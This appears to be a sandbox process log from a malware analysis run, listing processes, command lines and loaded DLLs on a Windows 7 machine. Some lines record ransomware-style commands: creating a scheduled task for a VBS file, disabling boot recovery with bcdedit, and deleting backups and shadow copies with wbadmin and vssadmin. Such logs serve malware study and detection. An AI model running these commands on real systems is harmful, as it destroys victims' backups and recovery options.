c:\program files\videolan\vlc\plugins\codec\liblpcm_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_h264_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_flac_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_dirac_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_mlp_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_vc1_plugin.dll
c:\windows\system32\userenv.dll
c:\program files\videolan\vlc\plugins\codec\libsvcdsub_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libspudec_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libcvdsub_plugin.dll
c:\program files\videolan\vlc\plugins\packetizer\libpacketizer_hevc_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libavcodec_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libmpeg_audio_plugin.dll
c:\program files\videolan\vlc\plugins\meta_engine\libtaglib_plugin.dll
c:\program files\videolan\vlc\plugins\lua\liblua_plugin.dll
c:\program files\videolan\vlc\plugins\meta_engine\libfolder_plugin.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\videolan\vlc\plugins\access\liblibbluray_plugin.dll
c:\program files\videolan\vlc\plugins\access\libaccess_bd_plugin.dll
c:\program files\videolan\vlc\plugins\access\libdvdnav_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libmp4_plugin.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\program files\videolan\vlc\plugins\demux\libavi_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libasf_plugin.dll
c:\program files\videolan\vlc\plugins\demux\libflacsys_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libjpeg_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libcdg_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libpng_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libschroedinger_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libdts_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libaraw_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libsubstx3g_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libflac_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libg711_plugin.dll
c:\program files\videolan\vlc\plugins\codec\liblibass_plugin.dll
c:\program files\videolan\vlc\plugins\codec\libfaad_plugin.dll
c:\program files\videolan\vlc\plugins\codec\liba52_plugin.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\audioses.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\program files\videolan\vlc\plugins\audio_mixer\libfloat_mixer_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libscaletempo_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libmpgatofixed32_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libdtstofloat32_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\liba52tofloat32_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libsamplerate_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libsimple_channel_mixer_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\liba52tospdif_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libdtstospdif_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libdolby_surround_decoder_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libugly_resampler_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libaudio_format_plugin.dll
c:\windows\system32\avrt.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll

PID
876
CMD
"C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 11 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs
Path
C:\Windows\system32\schtasks.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Manages scheduled tasks
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ktmw32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\xmllite.dll

PID
320
CMD
"C:\Windows\system32\cmd.exe" /c bcdedit /set cdxxcsh bootstatuspolicy ignoreallfailures
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
1580
CMD
"C:\Windows\system32\cmd.exe" /c bcdedit /set cdxxcsh recoveryenabled no
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
2644
CMD
"C:\Windows\system32\cmd.exe" /c wbadmin delete catalog -quiet
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967294
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbadmin.exe

PID
2832
CMD
bcdedit /set cdxxcsh bootstatuspolicy ignoreallfailures
Path
C:\Windows\system32\bcdedit.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Boot Configuration Data Editor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\bcdedit.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
2788
CMD
"C:\Windows\system32\cmd.exe" /c wbadmin delete systemstatebackup
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967293
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
1968
CMD
bcdedit /set cdxxcsh recoveryenabled no
Path
C:\Windows\system32\bcdedit.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Boot Configuration Data Editor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\bcdedit.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
3032
CMD
"C:\Windows\system32\cmd.exe" /c wbadmin delete backup
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967295
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
260
CMD
wbadmin delete catalog -quiet
Path
C:\Windows\system32\wbadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967294
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® BLB Backup
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\slc.dll
c:\windows\system32\credui.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll

PID
792
CMD
"C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\vssadmin.exe

PID
2388
CMD
wbadmin delete systemstatebackup
Path
C:\Windows\system32\wbadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967293
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® BLB Backup
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\slc.dll
c:\windows\system32\credui.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\cryptbase.dll

PID
2928
CMD
wbadmin delete backup
Path
C:\Windows\system32\wbadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967295
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® BLB Backup
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\slc.dll
c:\windows\system32\credui.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shlwapi.dll

PID
2012
CMD
vssadmin delete shadows /all /quiet
Path
C:\Windows\system32\vssadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® Volume Shadow Copy Service
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\vssadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\vsstrace.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\vssapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll

PID
2940
CMD
"C:\Program Files\WinRAR\WinRAR.exe" a -ep1 -scul -r0 -iext -- ramst007.rar C:\Users\admin\Desktop\ramst007.mp3
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_145eb2808b8d6928\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll

PID
2172
CMD
"C:\Program Files\Internet Explorer\iexplore.exe"
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\propsys.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\mssprxy.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\sxs.dll
c:\windows\system32\mlang.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\wshtcpip.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\naturallanguage6.dll
c:\windows\system32\nlsdata0009.dll
c:\windows\system32\nlslexicons0009.dll
c:\windows\system32\tquery.dll
c:\windows\system32\idstore.dll
c:\windows\system32\structuredquery.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\gpapi.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\netprofm.dll

PID
2484
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2172 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\d2d1.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\dwrite.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll
c:\windows\syswow64\p2pcollab.dll
c:\windows\syswow64\oleacc.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\uiautomationcore.dll
c:\windows\syswow64\psapi.dll
c:\windows\syswow64\windowscodecs.dll
c:\windows\syswow64\powrprof.dll
c:\windows\syswow64\winmm.dll
c:\windows\syswow64\imgutil.dll
c:\windows\syswow64\xmllite.dll
c:\windows\syswow64\windowscodecsext.dll
c:\windows\syswow64\msxml6.dll
c:\windows\syswow64\mfplat.dll
c:\windows\syswow64\avrt.dll
c:\windows\syswow64\uianimation.dll
c:\windows\syswow64\mshtmlmedia.dll
c:\windows\syswow64\mf.dll
c:\windows\syswow64\atl.dll
c:\windows\syswow64\ksuser.dll
c:\windows\syswow64\macromed\flash\flash32_27_0_0_187.ocx
c:\program files (x86)\common files\microsoft shared\ink\tiptsf.dll
c:\windows\syswow64\explorerframe.dll
c:\windows\syswow64\duser.dll
c:\windows\syswow64\dui70.dll
c:\windows\syswow64\ehstorshell.dll
c:\windows\syswow64\ntshrui.dll
c:\windows\syswow64\srvcli.dll
c:\windows\syswow64\cscapi.dll
c:\windows\syswow64\slc.dll
c:\windows\syswow64\imageres.dll
c:\windows\syswow64\msftedit.dll
c:\windows\syswow64\msls31.dll
c:\windows\syswow64\ntmarta.dll
c:\windows\syswow64\wldap32.dll
c:\windows\syswow64\structuredquery.dll
c:\windows\syswow64\actxprxy.dll
c:\windows\syswow64\thumbcache.dll
c:\windows\syswow64\searchfolder.dll
c:\windows\syswow64\shdocvw.dll
c:\windows\syswow64\networkexplorer.dll
c:\windows\syswow64\linkinfo.dll
c:\windows\syswow64\samcli.dll
c:\windows\syswow64\samlib.dll
c:\windows\syswow64\netutils.dll
c:\program files\ccleaner\ccleaner64.exe
c:\program files (x86)\adobe\acrobat reader dc\reader\acrord32.exe
c:\windows\installer\{ac76ba86-7ad7-ffff-7b44-ac0f074e4100}\sc_reader.ico
c:\program files\mozilla firefox\firefox.exe
c:\program files\videolan\vlc\vlc.exe
c:\program files (x86)\google\chrome\application\chrome.exe
c:\program files\opera x64\opera.dll
